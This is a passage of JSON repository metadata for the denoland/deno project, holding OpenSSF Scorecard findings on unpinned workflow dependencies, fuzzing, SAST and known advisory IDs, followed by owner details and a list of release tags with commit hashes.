.github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6